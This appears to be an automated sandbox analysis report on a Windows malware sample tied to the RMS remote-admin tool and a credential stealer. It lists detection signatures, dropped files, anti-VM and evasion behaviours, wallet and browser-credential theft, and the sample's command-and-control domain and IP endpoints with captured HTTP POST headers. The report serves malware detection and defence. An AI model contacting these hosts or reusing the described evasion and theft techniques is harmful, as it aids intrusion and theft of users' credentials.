Analysis Report 1wOdXavtlE.exe

Overview

General Information

Sample Name: 1wOdXavtlE.exe
Analysis ID: 383846
MD5: a7e67e6abd539aeddbb9021d23f6f217
SHA1: cea85a6d9e417f2b8c2b3962a1359defc096e502
SHA256: f1849f447bfa07c3a9a9db11501a026d133541d0264424198f297f5ec70e1ff3
Tags: exe

Detection

RMSRemoteAdmin
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Connects to many ports of the same IP (likely port scanning)
DLL side loading technique detected
Drops executables to the windows directory (C:\Windows) and starts them
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses regedit.exe to modify the Windows registry
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected RMS RemoteAdmin tool

Classification

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\ProgramData\is-PFD3D.tmp ReversingLabs: Detection: 55%
Source: C:\ProgramData\is-R3F67.tmp ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\servs.exe ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Metadefender: Detection: 18%
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe ReversingLabs: Detection: 39%
Multi AV Scanner detection for submitted file
Source: 1wOdXavtlE.exe Metadefender: Detection: 16%
Source: 1wOdXavtlE.exe ReversingLabs: Detection: 58%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: 1wOdXavtlE.exe Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files
Source: 1wOdXavtlE.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: C:\ProgramData\Immunity\rutserv.exe File created: C:\ProgramData\Remote Manipulator System\install.log
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: unknown HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.216.141.204:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.216.179.59:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49733 version: TLS 1.2
Source: 1wOdXavtlE.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: PasswordOnWakeSettingFlyout.pdb source: PasswordOnWakeSettingFlyout.exe, 00000017.00000000.454943243.00007FF7D9F57000.00000002.00020000.sdmp
Source: Binary string: PasswordOnWakeSettingFlyout.pdbGCTL source: PasswordOnWakeSettingFlyout.exe, 00000017.00000000.454943243.00007FF7D9F57000.00000002.00020000.sdmp
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_0040B268 FindFirstFileW,FindClose, 17_2_0040B268
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_0040AC9C GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW, 17_2_0040AC9C
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Code function: 19_2_005E9B24 FindFirstFileW,GetLastError, 19_2_005E9B24
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Code function: 19_2_0040CBFC FindFirstFileW,FindClose, 19_2_0040CBFC
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Code function: 19_2_0040C630 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW, 19_2_0040C630
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Code function: 19_2_00641778 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose, 19_2_00641778

Networking:

Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 86.107.197.8 ports 1,2,3,4,8,38214
Performs DNS queries to domains with low reputation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe DNS query: pokacienon.xyz
Source: C:\Users\user\Desktop\1wOdXavtlE.exe DNS query: pokacienon.xyz
Source: C:\Users\user\Desktop\1wOdXavtlE.exe DNS query: pokacienon.xyz
Source: C:\Users\user\Desktop\1wOdXavtlE.exe DNS query: pokacienon.xyz
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 38214
Source: unknown Network traffic detected: HTTP traffic on port 38214 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 38214 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 32972
Source: unknown Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 38214
Source: unknown Network traffic detected: HTTP traffic on port 38214 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 38214 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 38214
Source: unknown Network traffic detected: HTTP traffic on port 38214 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 38214 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 32972
Source: unknown Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 32972
Source: unknown Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 32972 -> 49763
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.6:49761 -> 86.107.197.8:38214
Source: global traffic TCP traffic: 192.168.2.6:49763 -> 195.54.160.9:32972
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: pokacienon.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"Host: pokacienon.xyzContent-Length: 1137076Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: pokacienon.xyzContent-Length: 1137062Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate"Host: pokacienon.xyzContent-Length: 1137088Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate"Host: pokacienon.xyzContent-Length: 1137088Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate"Host: pokacienon.xyzContent-Length: 1137088Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate"Host: pokacienon.xyzContent-Length: 1137088Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate"Host: pokacienon.xyzContent-Length: 1137088Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate"Host: pokacienon.xyzContent-Length: 1137088Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 86.107.197.8:38214Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 195.54.160.9:32972Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"Host: 86.107.197.8:38214Content-Length: 856112Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 86.107.197.8:38214Content-Length: 856098Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"Host: 195.54.160.9:32972Content-Length: 23182Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 195.54.160.9:32972Content-Length: 23168Expect: 100-continueAccept-Encoding: gzip, deflate
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.192.141.1
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 195.54.160.9
Source: unknown TCP traffic detected without corresponding DNS query: 195.54.160.9
Source: unknown TCP traffic detected without corresponding DNS query: 195.54.160.9
Source: unknown TCP traffic detected without corresponding DNS query: 195.54.160.9
Source: unknown TCP traffic detected without corresponding DNS query: 195.54.160.9
Source: unknown TCP traffic detected without corresponding DNS query: 195.54.160.9
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: svchost.exe, 0000000F.00000002.465315065.00000221A3B13000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD",
"MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-04-01T08:42:55.8407457Z||.||646da06c-a69a-4aff-bcc8-3f5a349348ca||1152921505693336001||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000000F.00000002.465315065.00000221A3B13000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD",
"MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-04-01T08:42:55.8407457Z||.||646da06c-a69a-4aff-bcc8-3f5a349348ca||1152921505693336001||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000000F.00000003.450300636.00000221A3B74000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JEc equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000F.00000003.450300636.00000221A3B74000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JEc equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000F.00000003.442264061.00000221A3B95000.00000004.00000001.sdmp String found in binary or memory: t enough.\r\n\r\nSHARE WITH FRIENDS\r\nSend photos and videos to keep your close friends up to speed. Receive files for even more productivity.\r\n\r\n\r\n*Calls are free over Wi-Fi but otherwise standard data charges apply.\r\nPrivacy Policy: https://www.facebook.com/about/privacy | LEARN MORE at: https://messenger.com (https://messenger.com/)","ProductTitle":"Messenger","SearchTitles":[],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9WZDNCRF0083","Properties":{"PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","P
